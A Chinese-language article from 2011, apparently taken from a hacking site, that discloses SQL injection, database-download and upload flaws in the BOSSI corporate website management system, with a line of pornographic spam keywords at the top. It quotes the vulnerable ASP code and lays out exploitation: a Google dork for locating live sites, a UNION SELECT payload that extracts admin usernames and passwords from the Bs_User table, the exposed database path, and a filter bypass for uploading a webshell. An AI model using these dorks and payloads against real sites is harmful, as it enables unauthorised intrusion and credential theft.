亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

BOSSI 公司企業(yè)網(wǎng)站管理系統(tǒng)注入&上傳漏洞利用

  發(fā)布時間:2011-12-28 17:06:21   作者:佚名   我要評論
BOSSI 公司(企業(yè))網(wǎng)站管理系統(tǒng),中英文雙語版,后臺在同一頁內(nèi)同時管理添加修改資料內(nèi)的中英文內(nèi)容,網(wǎng)站的左邊欄使用了模塊,可以自由的增加&刪除,可以不用修改代碼
讓不懂編寫網(wǎng)頁的人也可以有自己的公司(企業(yè))網(wǎng)站,基本資料都在后臺管理添加修改,網(wǎng)站的標題、地址、版權(quán)、公司郵局、收藏等資料可以在后臺的"公司資料"里管理

----------------------------------------------------
漏洞一:注入漏洞,

漏洞頁面:NewsInfo.asp,

漏洞代碼:if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if

Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Conews where id="&id, conn,3,3
'紀錄訪問次數(shù)
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")

id變量未處理直接代入sql查詢,可注射,用啊d就行

頁面二:yeNewsInfo.asp

漏洞代碼:<%
if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if

Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Yenews where id="&id, conn,3,3
'紀錄訪問次數(shù)
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")
'定義內(nèi)容
content=ubbcode(rs("content"))
%>

原理同上,可注入。

漏洞二:數(shù)據(jù)庫下載漏洞

數(shù)據(jù)庫地址:Database/DataShop.mdb

為建立放下載表,可任意下載!

漏洞三:上傳漏洞

漏洞頁面:upfile.asp ,upfilea.asp

問題代碼:fileExt=lcase(file.FileExt)
   Forumupload=split(UpFileType,"|")
   for i=0 to ubound(Forumupload)
    if fileEXT=trim(Forumupload(i)) then
     EnableUpload=true
     exit for
    end if
   next
   if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
    EnableUpload=false
   end if
   if EnableUpload=false then
    msg="這種文件類型不允許上傳!\n\n只允許上傳這幾種文件類型:" & UpFileType
    founderr=true
   end if

和那個良精的上傳漏洞一樣,不知道是誰抄誰的代碼了!注冊用戶,本地上傳php的大馬或者加空格過濾上傳asp大馬,具體方法我就不說了,在淺析良精企業(yè)網(wǎng)站管理程序一文中提到過了!不再贅述!

漏洞利用:注入,Google:inurl:yeNewsInfo.asp?Id

注入語句:%20and%201=2%20union%20select%201,username,3,4,password%20from%20Bs_User

 

或者啊d:需要手動添加表段:Bs_User

數(shù)據(jù)庫漏洞利用:

挖掘機:關(guān)鍵字:inurl:yeNewsInfo.asp?Id

后綴:Database/DataShop.mdb

關(guān)于上傳漏洞的利用我就不演示了,可參照 淺析良精企業(yè)網(wǎng)站管理系統(tǒng)漏洞 一文。

相關(guān)文章

最新評論